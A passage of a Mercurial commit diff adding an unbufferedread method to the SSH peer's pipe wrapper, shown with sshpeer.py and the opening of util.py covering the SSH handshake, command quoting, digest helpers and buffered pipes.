##// END OF EJS Templates
ssh: avoid reading beyond the end of stream when using compression...
Joerg Sonnenberger -
r38735:27391d74 default
parent child Browse files
Show More
@@ -1,635 +1,646 b''
1 1 # sshpeer.py - ssh repository proxy class for mercurial
2 2 #
3 3 # Copyright 2005, 2006 Matt Mackall <mpm@selenic.com>
4 4 #
5 5 # This software may be used and distributed according to the terms of the
6 6 # GNU General Public License version 2 or any later version.
7 7
8 8 from __future__ import absolute_import
9 9
10 10 import re
11 11 import uuid
12 12
13 13 from .i18n import _
14 14 from . import (
15 15 error,
16 16 pycompat,
17 17 util,
18 18 wireprotoserver,
19 19 wireprototypes,
20 20 wireprotov1peer,
21 21 wireprotov1server,
22 22 )
23 23 from .utils import (
24 24 procutil,
25 25 stringutil,
26 26 )
27 27
28 28 def _serverquote(s):
29 29 """quote a string for the remote shell ... which we assume is sh"""
30 30 if not s:
31 31 return s
32 32 if re.match('[a-zA-Z0-9@%_+=:,./-]*$', s):
33 33 return s
34 34 return "'%s'" % s.replace("'", "'\\''")
35 35
36 36 def _forwardoutput(ui, pipe):
37 37 """display all data currently available on pipe as remote output.
38 38
39 39 This is non blocking."""
40 40 if pipe:
41 41 s = procutil.readpipe(pipe)
42 42 if s:
43 43 for l in s.splitlines():
44 44 ui.status(_("remote: "), l, '\n')
45 45
46 46 class doublepipe(object):
47 47 """Operate a side-channel pipe in addition of a main one
48 48
49 49 The side-channel pipe contains server output to be forwarded to the user
50 50 input. The double pipe will behave as the "main" pipe, but will ensure the
51 51 content of the "side" pipe is properly processed while we wait for blocking
52 52 call on the "main" pipe.
53 53
54 54 If large amounts of data are read from "main", the forward will cease after
55 55 the first bytes start to appear. This simplifies the implementation
56 56 without affecting actual output of sshpeer too much as we rarely issue
57 57 large read for data not yet emitted by the server.
58 58
59 59 The main pipe is expected to be a 'bufferedinputpipe' from the util module
60 60 that handle all the os specific bits. This class lives in this module
61 61 because it focus on behavior specific to the ssh protocol."""
62 62
63 63 def __init__(self, ui, main, side):
64 64 self._ui = ui
65 65 self._main = main
66 66 self._side = side
67 67
68 68 def _wait(self):
69 69 """wait until some data are available on main or side
70 70
71 71 return a pair of boolean (ismainready, issideready)
72 72
73 73 (This will only wait for data if the setup is supported by `util.poll`)
74 74 """
75 75 if (isinstance(self._main, util.bufferedinputpipe) and
76 76 self._main.hasbuffer):
77 77 # Main has data. Assume side is worth poking at.
78 78 return True, True
79 79
80 80 fds = [self._main.fileno(), self._side.fileno()]
81 81 try:
82 82 act = util.poll(fds)
83 83 except NotImplementedError:
84 84 # non supported yet case, assume all have data.
85 85 act = fds
86 86 return (self._main.fileno() in act, self._side.fileno() in act)
87 87
88 88 def write(self, data):
89 89 return self._call('write', data)
90 90
91 91 def read(self, size):
92 92 r = self._call('read', size)
93 93 if size != 0 and not r:
94 94 # We've observed a condition that indicates the
95 95 # stdout closed unexpectedly. Check stderr one
96 96 # more time and snag anything that's there before
97 97 # letting anyone know the main part of the pipe
98 98 # closed prematurely.
99 99 _forwardoutput(self._ui, self._side)
100 100 return r
101 101
102 def unbufferedread(self, size):
103 r = self._call('unbufferedread', size)
104 if size != 0 and not r:
105 # We've observed a condition that indicates the
106 # stdout closed unexpectedly. Check stderr one
107 # more time and snag anything that's there before
108 # letting anyone know the main part of the pipe
109 # closed prematurely.
110 _forwardoutput(self._ui, self._side)
111 return r
112
102 113 def readline(self):
103 114 return self._call('readline')
104 115
105 116 def _call(self, methname, data=None):
106 117 """call <methname> on "main", forward output of "side" while blocking
107 118 """
108 119 # data can be '' or 0
109 120 if (data is not None and not data) or self._main.closed:
110 121 _forwardoutput(self._ui, self._side)
111 122 return ''
112 123 while True:
113 124 mainready, sideready = self._wait()
114 125 if sideready:
115 126 _forwardoutput(self._ui, self._side)
116 127 if mainready:
117 128 meth = getattr(self._main, methname)
118 129 if data is None:
119 130 return meth()
120 131 else:
121 132 return meth(data)
122 133
123 134 def close(self):
124 135 return self._main.close()
125 136
126 137 def flush(self):
127 138 return self._main.flush()
128 139
129 140 def _cleanuppipes(ui, pipei, pipeo, pipee):
130 141 """Clean up pipes used by an SSH connection."""
131 142 if pipeo:
132 143 pipeo.close()
133 144 if pipei:
134 145 pipei.close()
135 146
136 147 if pipee:
137 148 # Try to read from the err descriptor until EOF.
138 149 try:
139 150 for l in pipee:
140 151 ui.status(_('remote: '), l)
141 152 except (IOError, ValueError):
142 153 pass
143 154
144 155 pipee.close()
145 156
146 157 def _makeconnection(ui, sshcmd, args, remotecmd, path, sshenv=None):
147 158 """Create an SSH connection to a server.
148 159
149 160 Returns a tuple of (process, stdin, stdout, stderr) for the
150 161 spawned process.
151 162 """
152 163 cmd = '%s %s %s' % (
153 164 sshcmd,
154 165 args,
155 166 procutil.shellquote('%s -R %s serve --stdio' % (
156 167 _serverquote(remotecmd), _serverquote(path))))
157 168
158 169 ui.debug('running %s\n' % cmd)
159 170 cmd = procutil.quotecommand(cmd)
160 171
161 172 # no buffer allow the use of 'select'
162 173 # feel free to remove buffering and select usage when we ultimately
163 174 # move to threading.
164 175 stdin, stdout, stderr, proc = procutil.popen4(cmd, bufsize=0, env=sshenv)
165 176
166 177 return proc, stdin, stdout, stderr
167 178
168 179 def _clientcapabilities():
169 180 """Return list of capabilities of this client.
170 181
171 182 Returns a list of capabilities that are supported by this client.
172 183 """
173 184 protoparams = {'partial-pull'}
174 185 comps = [e.wireprotosupport().name for e in
175 186 util.compengines.supportedwireengines(util.CLIENTROLE)]
176 187 protoparams.add('comp=%s' % ','.join(comps))
177 188 return protoparams
178 189
179 190 def _performhandshake(ui, stdin, stdout, stderr):
180 191 def badresponse():
181 192 # Flush any output on stderr.
182 193 _forwardoutput(ui, stderr)
183 194
184 195 msg = _('no suitable response from remote hg')
185 196 hint = ui.config('ui', 'ssherrorhint')
186 197 raise error.RepoError(msg, hint=hint)
187 198
188 199 # The handshake consists of sending wire protocol commands in reverse
189 200 # order of protocol implementation and then sniffing for a response
190 201 # to one of them.
191 202 #
192 203 # Those commands (from oldest to newest) are:
193 204 #
194 205 # ``between``
195 206 # Asks for the set of revisions between a pair of revisions. Command
196 207 # present in all Mercurial server implementations.
197 208 #
198 209 # ``hello``
199 210 # Instructs the server to advertise its capabilities. Introduced in
200 211 # Mercurial 0.9.1.
201 212 #
202 213 # ``upgrade``
203 214 # Requests upgrade from default transport protocol version 1 to
204 215 # a newer version. Introduced in Mercurial 4.6 as an experimental
205 216 # feature.
206 217 #
207 218 # The ``between`` command is issued with a request for the null
208 219 # range. If the remote is a Mercurial server, this request will
209 220 # generate a specific response: ``1\n\n``. This represents the
210 221 # wire protocol encoded value for ``\n``. We look for ``1\n\n``
211 222 # in the output stream and know this is the response to ``between``
212 223 # and we're at the end of our handshake reply.
213 224 #
214 225 # The response to the ``hello`` command will be a line with the
215 226 # length of the value returned by that command followed by that
216 227 # value. If the server doesn't support ``hello`` (which should be
217 228 # rare), that line will be ``0\n``. Otherwise, the value will contain
218 229 # RFC 822 like lines. Of these, the ``capabilities:`` line contains
219 230 # the capabilities of the server.
220 231 #
221 232 # The ``upgrade`` command isn't really a command in the traditional
222 233 # sense of version 1 of the transport because it isn't using the
223 234 # proper mechanism for formatting insteads: instead, it just encodes
224 235 # arguments on the line, delimited by spaces.
225 236 #
226 237 # The ``upgrade`` line looks like ``upgrade <token> <capabilities>``.
227 238 # If the server doesn't support protocol upgrades, it will reply to
228 239 # this line with ``0\n``. Otherwise, it emits an
229 240 # ``upgraded <token> <protocol>`` line to both stdout and stderr.
230 241 # Content immediately following this line describes additional
231 242 # protocol and server state.
232 243 #
233 244 # In addition to the responses to our command requests, the server
234 245 # may emit "banner" output on stdout. SSH servers are allowed to
235 246 # print messages to stdout on login. Issuing commands on connection
236 247 # allows us to flush this banner output from the server by scanning
237 248 # for output to our well-known ``between`` command. Of course, if
238 249 # the banner contains ``1\n\n``, this will throw off our detection.
239 250
240 251 requestlog = ui.configbool('devel', 'debug.peer-request')
241 252
242 253 # Generate a random token to help identify responses to version 2
243 254 # upgrade request.
244 255 token = pycompat.sysbytes(str(uuid.uuid4()))
245 256 upgradecaps = [
246 257 ('proto', wireprotoserver.SSHV2),
247 258 ]
248 259 upgradecaps = util.urlreq.urlencode(upgradecaps)
249 260
250 261 try:
251 262 pairsarg = '%s-%s' % ('0' * 40, '0' * 40)
252 263 handshake = [
253 264 'hello\n',
254 265 'between\n',
255 266 'pairs %d\n' % len(pairsarg),
256 267 pairsarg,
257 268 ]
258 269
259 270 # Request upgrade to version 2 if configured.
260 271 if ui.configbool('experimental', 'sshpeer.advertise-v2'):
261 272 ui.debug('sending upgrade request: %s %s\n' % (token, upgradecaps))
262 273 handshake.insert(0, 'upgrade %s %s\n' % (token, upgradecaps))
263 274
264 275 if requestlog:
265 276 ui.debug('devel-peer-request: hello+between\n')
266 277 ui.debug('devel-peer-request: pairs: %d bytes\n' % len(pairsarg))
267 278 ui.debug('sending hello command\n')
268 279 ui.debug('sending between command\n')
269 280
270 281 stdin.write(''.join(handshake))
271 282 stdin.flush()
272 283 except IOError:
273 284 badresponse()
274 285
275 286 # Assume version 1 of wire protocol by default.
276 287 protoname = wireprototypes.SSHV1
277 288 reupgraded = re.compile(b'^upgraded %s (.*)$' % stringutil.reescape(token))
278 289
279 290 lines = ['', 'dummy']
280 291 max_noise = 500
281 292 while lines[-1] and max_noise:
282 293 try:
283 294 l = stdout.readline()
284 295 _forwardoutput(ui, stderr)
285 296
286 297 # Look for reply to protocol upgrade request. It has a token
287 298 # in it, so there should be no false positives.
288 299 m = reupgraded.match(l)
289 300 if m:
290 301 protoname = m.group(1)
291 302 ui.debug('protocol upgraded to %s\n' % protoname)
292 303 # If an upgrade was handled, the ``hello`` and ``between``
293 304 # requests are ignored. The next output belongs to the
294 305 # protocol, so stop scanning lines.
295 306 break
296 307
297 308 # Otherwise it could be a banner, ``0\n`` response if server
298 309 # doesn't support upgrade.
299 310
300 311 if lines[-1] == '1\n' and l == '\n':
301 312 break
302 313 if l:
303 314 ui.debug('remote: ', l)
304 315 lines.append(l)
305 316 max_noise -= 1
306 317 except IOError:
307 318 badresponse()
308 319 else:
309 320 badresponse()
310 321
311 322 caps = set()
312 323
313 324 # For version 1, we should see a ``capabilities`` line in response to the
314 325 # ``hello`` command.
315 326 if protoname == wireprototypes.SSHV1:
316 327 for l in reversed(lines):
317 328 # Look for response to ``hello`` command. Scan from the back so
318 329 # we don't misinterpret banner output as the command reply.
319 330 if l.startswith('capabilities:'):
320 331 caps.update(l[:-1].split(':')[1].split())
321 332 break
322 333 elif protoname == wireprotoserver.SSHV2:
323 334 # We see a line with number of bytes to follow and then a value
324 335 # looking like ``capabilities: *``.
325 336 line = stdout.readline()
326 337 try:
327 338 valuelen = int(line)
328 339 except ValueError:
329 340 badresponse()
330 341
331 342 capsline = stdout.read(valuelen)
332 343 if not capsline.startswith('capabilities: '):
333 344 badresponse()
334 345
335 346 ui.debug('remote: %s\n' % capsline)
336 347
337 348 caps.update(capsline.split(':')[1].split())
338 349 # Trailing newline.
339 350 stdout.read(1)
340 351
341 352 # Error if we couldn't find capabilities, this means:
342 353 #
343 354 # 1. Remote isn't a Mercurial server
344 355 # 2. Remote is a <0.9.1 Mercurial server
345 356 # 3. Remote is a future Mercurial server that dropped ``hello``
346 357 # and other attempted handshake mechanisms.
347 358 if not caps:
348 359 badresponse()
349 360
350 361 # Flush any output on stderr before proceeding.
351 362 _forwardoutput(ui, stderr)
352 363
353 364 return protoname, caps
354 365
355 366 class sshv1peer(wireprotov1peer.wirepeer):
356 367 def __init__(self, ui, url, proc, stdin, stdout, stderr, caps,
357 368 autoreadstderr=True):
358 369 """Create a peer from an existing SSH connection.
359 370
360 371 ``proc`` is a handle on the underlying SSH process.
361 372 ``stdin``, ``stdout``, and ``stderr`` are handles on the stdio
362 373 pipes for that process.
363 374 ``caps`` is a set of capabilities supported by the remote.
364 375 ``autoreadstderr`` denotes whether to automatically read from
365 376 stderr and to forward its output.
366 377 """
367 378 self._url = url
368 379 self.ui = ui
369 380 # self._subprocess is unused. Keeping a handle on the process
370 381 # holds a reference and prevents it from being garbage collected.
371 382 self._subprocess = proc
372 383
373 384 # And we hook up our "doublepipe" wrapper to allow querying
374 385 # stderr any time we perform I/O.
375 386 if autoreadstderr:
376 387 stdout = doublepipe(ui, util.bufferedinputpipe(stdout), stderr)
377 388 stdin = doublepipe(ui, stdin, stderr)
378 389
379 390 self._pipeo = stdin
380 391 self._pipei = stdout
381 392 self._pipee = stderr
382 393 self._caps = caps
383 394 self._autoreadstderr = autoreadstderr
384 395
385 396 # Commands that have a "framed" response where the first line of the
386 397 # response contains the length of that response.
387 398 _FRAMED_COMMANDS = {
388 399 'batch',
389 400 }
390 401
391 402 # Begin of ipeerconnection interface.
392 403
393 404 def url(self):
394 405 return self._url
395 406
396 407 def local(self):
397 408 return None
398 409
399 410 def peer(self):
400 411 return self
401 412
402 413 def canpush(self):
403 414 return True
404 415
405 416 def close(self):
406 417 pass
407 418
408 419 # End of ipeerconnection interface.
409 420
410 421 # Begin of ipeercommands interface.
411 422
412 423 def capabilities(self):
413 424 return self._caps
414 425
415 426 # End of ipeercommands interface.
416 427
417 428 def _readerr(self):
418 429 _forwardoutput(self.ui, self._pipee)
419 430
420 431 def _abort(self, exception):
421 432 self._cleanup()
422 433 raise exception
423 434
424 435 def _cleanup(self):
425 436 _cleanuppipes(self.ui, self._pipei, self._pipeo, self._pipee)
426 437
427 438 __del__ = _cleanup
428 439
429 440 def _sendrequest(self, cmd, args, framed=False):
430 441 if (self.ui.debugflag
431 442 and self.ui.configbool('devel', 'debug.peer-request')):
432 443 dbg = self.ui.debug
433 444 line = 'devel-peer-request: %s\n'
434 445 dbg(line % cmd)
435 446 for key, value in sorted(args.items()):
436 447 if not isinstance(value, dict):
437 448 dbg(line % ' %s: %d bytes' % (key, len(value)))
438 449 else:
439 450 for dk, dv in sorted(value.items()):
440 451 dbg(line % ' %s-%s: %d' % (key, dk, len(dv)))
441 452 self.ui.debug("sending %s command\n" % cmd)
442 453 self._pipeo.write("%s\n" % cmd)
443 454 _func, names = wireprotov1server.commands[cmd]
444 455 keys = names.split()
445 456 wireargs = {}
446 457 for k in keys:
447 458 if k == '*':
448 459 wireargs['*'] = args
449 460 break
450 461 else:
451 462 wireargs[k] = args[k]
452 463 del args[k]
453 464 for k, v in sorted(wireargs.iteritems()):
454 465 self._pipeo.write("%s %d\n" % (k, len(v)))
455 466 if isinstance(v, dict):
456 467 for dk, dv in v.iteritems():
457 468 self._pipeo.write("%s %d\n" % (dk, len(dv)))
458 469 self._pipeo.write(dv)
459 470 else:
460 471 self._pipeo.write(v)
461 472 self._pipeo.flush()
462 473
463 474 # We know exactly how many bytes are in the response. So return a proxy
464 475 # around the raw output stream that allows reading exactly this many
465 476 # bytes. Callers then can read() without fear of overrunning the
466 477 # response.
467 478 if framed:
468 479 amount = self._getamount()
469 480 return util.cappedreader(self._pipei, amount)
470 481
471 482 return self._pipei
472 483
473 484 def _callstream(self, cmd, **args):
474 485 args = pycompat.byteskwargs(args)
475 486 return self._sendrequest(cmd, args, framed=cmd in self._FRAMED_COMMANDS)
476 487
477 488 def _callcompressable(self, cmd, **args):
478 489 args = pycompat.byteskwargs(args)
479 490 return self._sendrequest(cmd, args, framed=cmd in self._FRAMED_COMMANDS)
480 491
481 492 def _call(self, cmd, **args):
482 493 args = pycompat.byteskwargs(args)
483 494 return self._sendrequest(cmd, args, framed=True).read()
484 495
485 496 def _callpush(self, cmd, fp, **args):
486 497 # The server responds with an empty frame if the client should
487 498 # continue submitting the payload.
488 499 r = self._call(cmd, **args)
489 500 if r:
490 501 return '', r
491 502
492 503 # The payload consists of frames with content followed by an empty
493 504 # frame.
494 505 for d in iter(lambda: fp.read(4096), ''):
495 506 self._writeframed(d)
496 507 self._writeframed("", flush=True)
497 508
498 509 # In case of success, there is an empty frame and a frame containing
499 510 # the integer result (as a string).
500 511 # In case of error, there is a non-empty frame containing the error.
501 512 r = self._readframed()
502 513 if r:
503 514 return '', r
504 515 return self._readframed(), ''
505 516
506 517 def _calltwowaystream(self, cmd, fp, **args):
507 518 # The server responds with an empty frame if the client should
508 519 # continue submitting the payload.
509 520 r = self._call(cmd, **args)
510 521 if r:
511 522 # XXX needs to be made better
512 523 raise error.Abort(_('unexpected remote reply: %s') % r)
513 524
514 525 # The payload consists of frames with content followed by an empty
515 526 # frame.
516 527 for d in iter(lambda: fp.read(4096), ''):
517 528 self._writeframed(d)
518 529 self._writeframed("", flush=True)
519 530
520 531 return self._pipei
521 532
522 533 def _getamount(self):
523 534 l = self._pipei.readline()
524 535 if l == '\n':
525 536 if self._autoreadstderr:
526 537 self._readerr()
527 538 msg = _('check previous remote output')
528 539 self._abort(error.OutOfBandError(hint=msg))
529 540 if self._autoreadstderr:
530 541 self._readerr()
531 542 try:
532 543 return int(l)
533 544 except ValueError:
534 545 self._abort(error.ResponseError(_("unexpected response:"), l))
535 546
536 547 def _readframed(self):
537 548 size = self._getamount()
538 549 if not size:
539 550 return b''
540 551
541 552 return self._pipei.read(size)
542 553
543 554 def _writeframed(self, data, flush=False):
544 555 self._pipeo.write("%d\n" % len(data))
545 556 if data:
546 557 self._pipeo.write(data)
547 558 if flush:
548 559 self._pipeo.flush()
549 560 if self._autoreadstderr:
550 561 self._readerr()
551 562
552 563 class sshv2peer(sshv1peer):
553 564 """A peer that speakers version 2 of the transport protocol."""
554 565 # Currently version 2 is identical to version 1 post handshake.
555 566 # And handshake is performed before the peer is instantiated. So
556 567 # we need no custom code.
557 568
558 569 def makepeer(ui, path, proc, stdin, stdout, stderr, autoreadstderr=True):
559 570 """Make a peer instance from existing pipes.
560 571
561 572 ``path`` and ``proc`` are stored on the eventual peer instance and may
562 573 not be used for anything meaningful.
563 574
564 575 ``stdin``, ``stdout``, and ``stderr`` are the pipes connected to the
565 576 SSH server's stdio handles.
566 577
567 578 This function is factored out to allow creating peers that don't
568 579 actually spawn a new process. It is useful for starting SSH protocol
569 580 servers and clients via non-standard means, which can be useful for
570 581 testing.
571 582 """
572 583 try:
573 584 protoname, caps = _performhandshake(ui, stdin, stdout, stderr)
574 585 except Exception:
575 586 _cleanuppipes(ui, stdout, stdin, stderr)
576 587 raise
577 588
578 589 if protoname == wireprototypes.SSHV1:
579 590 return sshv1peer(ui, path, proc, stdin, stdout, stderr, caps,
580 591 autoreadstderr=autoreadstderr)
581 592 elif protoname == wireprototypes.SSHV2:
582 593 return sshv2peer(ui, path, proc, stdin, stdout, stderr, caps,
583 594 autoreadstderr=autoreadstderr)
584 595 else:
585 596 _cleanuppipes(ui, stdout, stdin, stderr)
586 597 raise error.RepoError(_('unknown version of SSH protocol: %s') %
587 598 protoname)
588 599
589 600 def instance(ui, path, create, intents=None):
590 601 """Create an SSH peer.
591 602
592 603 The returned object conforms to the ``wireprotov1peer.wirepeer`` interface.
593 604 """
594 605 u = util.url(path, parsequery=False, parsefragment=False)
595 606 if u.scheme != 'ssh' or not u.host or u.path is None:
596 607 raise error.RepoError(_("couldn't parse location %s") % path)
597 608
598 609 util.checksafessh(path)
599 610
600 611 if u.passwd is not None:
601 612 raise error.RepoError(_('password in URL not supported'))
602 613
603 614 sshcmd = ui.config('ui', 'ssh')
604 615 remotecmd = ui.config('ui', 'remotecmd')
605 616 sshaddenv = dict(ui.configitems('sshenv'))
606 617 sshenv = procutil.shellenviron(sshaddenv)
607 618 remotepath = u.path or '.'
608 619
609 620 args = procutil.sshargs(sshcmd, u.host, u.user, u.port)
610 621
611 622 if create:
612 623 cmd = '%s %s %s' % (sshcmd, args,
613 624 procutil.shellquote('%s init %s' %
614 625 (_serverquote(remotecmd), _serverquote(remotepath))))
615 626 ui.debug('running %s\n' % cmd)
616 627 res = ui.system(cmd, blockedtag='sshpeer', environ=sshenv)
617 628 if res != 0:
618 629 raise error.RepoError(_('could not create remote repo'))
619 630
620 631 proc, stdin, stdout, stderr = _makeconnection(ui, sshcmd, args, remotecmd,
621 632 remotepath, sshenv)
622 633
623 634 peer = makepeer(ui, path, proc, stdin, stdout, stderr)
624 635
625 636 # Finally, if supported by the server, notify it about our own
626 637 # capabilities.
627 638 if 'protocaps' in peer.capabilities():
628 639 try:
629 640 peer._call("protocaps",
630 641 caps=' '.join(sorted(_clientcapabilities())))
631 642 except IOError:
632 643 peer._cleanup()
633 644 raise error.RepoError(_('capability exchange failed'))
634 645
635 646 return peer
@@ -1,3757 +1,3838 b''
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import bz2
20 20 import collections
21 21 import contextlib
22 22 import errno
23 23 import gc
24 24 import hashlib
25 25 import itertools
26 26 import mmap
27 27 import os
28 28 import platform as pyplatform
29 29 import re as remod
30 30 import shutil
31 31 import socket
32 32 import stat
33 33 import sys
34 34 import time
35 35 import traceback
36 36 import warnings
37 37 import zlib
38 38
39 39 from . import (
40 40 encoding,
41 41 error,
42 42 i18n,
43 43 node as nodemod,
44 44 policy,
45 45 pycompat,
46 46 urllibcompat,
47 47 )
48 48 from .utils import (
49 49 procutil,
50 50 stringutil,
51 51 )
52 52
53 53 base85 = policy.importmod(r'base85')
54 54 osutil = policy.importmod(r'osutil')
55 55 parsers = policy.importmod(r'parsers')
56 56
57 57 b85decode = base85.b85decode
58 58 b85encode = base85.b85encode
59 59
60 60 cookielib = pycompat.cookielib
61 61 httplib = pycompat.httplib
62 62 pickle = pycompat.pickle
63 63 safehasattr = pycompat.safehasattr
64 64 socketserver = pycompat.socketserver
65 65 bytesio = pycompat.bytesio
66 66 # TODO deprecate stringio name, as it is a lie on Python 3.
67 67 stringio = bytesio
68 68 xmlrpclib = pycompat.xmlrpclib
69 69
70 70 httpserver = urllibcompat.httpserver
71 71 urlerr = urllibcompat.urlerr
72 72 urlreq = urllibcompat.urlreq
73 73
74 74 # workaround for win32mbcs
75 75 _filenamebytestr = pycompat.bytestr
76 76
77 77 if pycompat.iswindows:
78 78 from . import windows as platform
79 79 else:
80 80 from . import posix as platform
81 81
82 82 _ = i18n._
83 83
84 84 bindunixsocket = platform.bindunixsocket
85 85 cachestat = platform.cachestat
86 86 checkexec = platform.checkexec
87 87 checklink = platform.checklink
88 88 copymode = platform.copymode
89 89 expandglobs = platform.expandglobs
90 90 getfsmountpoint = platform.getfsmountpoint
91 91 getfstype = platform.getfstype
92 92 groupmembers = platform.groupmembers
93 93 groupname = platform.groupname
94 94 isexec = platform.isexec
95 95 isowner = platform.isowner
96 96 listdir = osutil.listdir
97 97 localpath = platform.localpath
98 98 lookupreg = platform.lookupreg
99 99 makedir = platform.makedir
100 100 nlinks = platform.nlinks
101 101 normpath = platform.normpath
102 102 normcase = platform.normcase
103 103 normcasespec = platform.normcasespec
104 104 normcasefallback = platform.normcasefallback
105 105 openhardlinks = platform.openhardlinks
106 106 oslink = platform.oslink
107 107 parsepatchoutput = platform.parsepatchoutput
108 108 pconvert = platform.pconvert
109 109 poll = platform.poll
110 110 posixfile = platform.posixfile
111 111 rename = platform.rename
112 112 removedirs = platform.removedirs
113 113 samedevice = platform.samedevice
114 114 samefile = platform.samefile
115 115 samestat = platform.samestat
116 116 setflags = platform.setflags
117 117 split = platform.split
118 118 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
119 119 statisexec = platform.statisexec
120 120 statislink = platform.statislink
121 121 umask = platform.umask
122 122 unlink = platform.unlink
123 123 username = platform.username
124 124
125 125 try:
126 126 recvfds = osutil.recvfds
127 127 except AttributeError:
128 128 pass
129 129
130 130 # Python compatibility
131 131
132 132 _notset = object()
133 133
134 134 def bitsfrom(container):
135 135 bits = 0
136 136 for bit in container:
137 137 bits |= bit
138 138 return bits
139 139
140 140 # python 2.6 still have deprecation warning enabled by default. We do not want
141 141 # to display anything to standard user so detect if we are running test and
142 142 # only use python deprecation warning in this case.
143 143 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
144 144 if _dowarn:
145 145 # explicitly unfilter our warning for python 2.7
146 146 #
147 147 # The option of setting PYTHONWARNINGS in the test runner was investigated.
148 148 # However, module name set through PYTHONWARNINGS was exactly matched, so
149 149 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
150 150 # makes the whole PYTHONWARNINGS thing useless for our usecase.
151 151 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
152 152 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
153 153 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
154 154 if _dowarn and pycompat.ispy3:
155 155 # silence warning emitted by passing user string to re.sub()
156 156 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
157 157 r'mercurial')
158 158 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
159 159 DeprecationWarning, r'mercurial')
160 160 # TODO: reinvent imp.is_frozen()
161 161 warnings.filterwarnings(r'ignore', r'the imp module is deprecated',
162 162 DeprecationWarning, r'mercurial')
163 163
164 164 def nouideprecwarn(msg, version, stacklevel=1):
165 165 """Issue an python native deprecation warning
166 166
167 167 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
168 168 """
169 169 if _dowarn:
170 170 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
171 171 " update your code.)") % version
172 172 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
173 173
174 174 DIGESTS = {
175 175 'md5': hashlib.md5,
176 176 'sha1': hashlib.sha1,
177 177 'sha512': hashlib.sha512,
178 178 }
179 179 # List of digest types from strongest to weakest
180 180 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
181 181
182 182 for k in DIGESTS_BY_STRENGTH:
183 183 assert k in DIGESTS
184 184
185 185 class digester(object):
186 186 """helper to compute digests.
187 187
188 188 This helper can be used to compute one or more digests given their name.
189 189
190 190 >>> d = digester([b'md5', b'sha1'])
191 191 >>> d.update(b'foo')
192 192 >>> [k for k in sorted(d)]
193 193 ['md5', 'sha1']
194 194 >>> d[b'md5']
195 195 'acbd18db4cc2f85cedef654fccc4a4d8'
196 196 >>> d[b'sha1']
197 197 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
198 198 >>> digester.preferred([b'md5', b'sha1'])
199 199 'sha1'
200 200 """
201 201
202 202 def __init__(self, digests, s=''):
203 203 self._hashes = {}
204 204 for k in digests:
205 205 if k not in DIGESTS:
206 206 raise error.Abort(_('unknown digest type: %s') % k)
207 207 self._hashes[k] = DIGESTS[k]()
208 208 if s:
209 209 self.update(s)
210 210
211 211 def update(self, data):
212 212 for h in self._hashes.values():
213 213 h.update(data)
214 214
215 215 def __getitem__(self, key):
216 216 if key not in DIGESTS:
217 217 raise error.Abort(_('unknown digest type: %s') % k)
218 218 return nodemod.hex(self._hashes[key].digest())
219 219
220 220 def __iter__(self):
221 221 return iter(self._hashes)
222 222
223 223 @staticmethod
224 224 def preferred(supported):
225 225 """returns the strongest digest type in both supported and DIGESTS."""
226 226
227 227 for k in DIGESTS_BY_STRENGTH:
228 228 if k in supported:
229 229 return k
230 230 return None
231 231
232 232 class digestchecker(object):
233 233 """file handle wrapper that additionally checks content against a given
234 234 size and digests.
235 235
236 236 d = digestchecker(fh, size, {'md5': '...'})
237 237
238 238 When multiple digests are given, all of them are validated.
239 239 """
240 240
241 241 def __init__(self, fh, size, digests):
242 242 self._fh = fh
243 243 self._size = size
244 244 self._got = 0
245 245 self._digests = dict(digests)
246 246 self._digester = digester(self._digests.keys())
247 247
248 248 def read(self, length=-1):
249 249 content = self._fh.read(length)
250 250 self._digester.update(content)
251 251 self._got += len(content)
252 252 return content
253 253
254 254 def validate(self):
255 255 if self._size != self._got:
256 256 raise error.Abort(_('size mismatch: expected %d, got %d') %
257 257 (self._size, self._got))
258 258 for k, v in self._digests.items():
259 259 if v != self._digester[k]:
260 260 # i18n: first parameter is a digest name
261 261 raise error.Abort(_('%s mismatch: expected %s, got %s') %
262 262 (k, v, self._digester[k]))
263 263
264 264 try:
265 265 buffer = buffer
266 266 except NameError:
267 267 def buffer(sliceable, offset=0, length=None):
268 268 if length is not None:
269 269 return memoryview(sliceable)[offset:offset + length]
270 270 return memoryview(sliceable)[offset:]
271 271
272 272 _chunksize = 4096
273 273
274 274 class bufferedinputpipe(object):
275 275 """a manually buffered input pipe
276 276
277 277 Python will not let us use buffered IO and lazy reading with 'polling' at
278 278 the same time. We cannot probe the buffer state and select will not detect
279 279 that data are ready to read if they are already buffered.
280 280
281 281 This class let us work around that by implementing its own buffering
282 282 (allowing efficient readline) while offering a way to know if the buffer is
283 283 empty from the output (allowing collaboration of the buffer with polling).
284 284
285 285 This class lives in the 'util' module because it makes use of the 'os'
286 286 module from the python stdlib.
287 287 """
288 288 def __new__(cls, fh):
289 289 # If we receive a fileobjectproxy, we need to use a variation of this
290 290 # class that notifies observers about activity.
291 291 if isinstance(fh, fileobjectproxy):
292 292 cls = observedbufferedinputpipe
293 293
294 294 return super(bufferedinputpipe, cls).__new__(cls)
295 295
296 296 def __init__(self, input):
297 297 self._input = input
298 298 self._buffer = []
299 299 self._eof = False
300 300 self._lenbuf = 0
301 301
302 302 @property
303 303 def hasbuffer(self):
304 304 """True is any data is currently buffered
305 305
